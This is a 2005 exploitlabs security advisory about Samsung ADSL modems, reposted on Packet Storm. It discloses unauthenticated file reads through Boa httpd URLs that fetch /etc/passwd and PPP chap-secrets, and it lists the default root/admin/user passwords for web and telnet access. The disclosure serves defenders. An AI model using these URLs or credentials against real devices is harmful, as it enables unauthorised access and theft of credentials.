EXPL-A-2005-002 exploitlabs.com Advisory 031 - The Samsung ADSL Modem ships with default root, admin, and user accounts and also allows for arbitrary file access on the underlying filesystem.
8781cdcc8a0e6d219a4402867b7c5194121711e509530df3a557353ae00e8bfe------------------------------------------------------------
- EXPL-A-2005-002 exploitlabs.com Advisory 031 -
------------------------------------------------------------
- Samsung ADSL Modem -
AFFECTED PRODUCTS
=================
Samsung ADSL Modem
Samgsung Eletronics
http://www.samsung.com
DETAILS
=======
1. Arbitrary reading of files
2. Default root password
3. root file system access
Known issues exist in Boa httpd as per:
FreeBSD-SA-00:60 Security Advisory
http://www.securiteam.com/unixfocus/6G0081P0AI.html and
http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html
note:
This is a hardware based product with built in httpd for
remote access, this is a seperate issue than the ones
formaly presented above, but carry the same implications.
Identification:
HTTP/1.0 400 Bad Request
Date: Sat, 03 Jan 1970 17:57:18 GMT
Server: Boa/0.93.15
Connection: close
Content-Type: text/html
Modem vendor Samsung Electronics (co) modem
co chipset vendor b500545354430002
cpe chipset vendor Samsung Electronics (co) cpe chipset
software version SMDK8947v1.2 Jul 11 2003 10:00:01
ADSL DMT version a-110.030620-10130710
Samsung ADSL modems run uClinux OS
http://www.uclinux.com
note:
Depending on the implimentation, other products
using a combination of Boa / uClinux may be
affected as well.
Item 1
=====
http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/
http://[someSamsung.ip]/var/ppp/chap-secrets
http://[someSamsung.ip]/bin/sh
Any remote user may request any file present
in the router/modem OS file system.
Files can be fetched unauthenticated via a
GET request in a browser.
Item 2
=====
Default user login / passwords exist in both
httpd ( http://[host]/cgi-bin/adsl.cgi) and telnet ports
root/root
admin/admin
user/user
Item 3
======
By telneting to the device and loging in as
root/root, remote users my access the filesystem.
The modem provides 256mb of ram for OS and
file system operations. In this implimentation
there is aprox 120mb free file system space
which allows for the posibility for remote
attackers to use the file system for malicious
communication and file storage. This allows
many scenarios such as a storing worm and/or
viral code.
#echo "some bad data" >file
SOLUTION:
=========
none to date
Samsung has been contacted
No patch released
Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
Donnie Werner
mail: morning_wood@zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed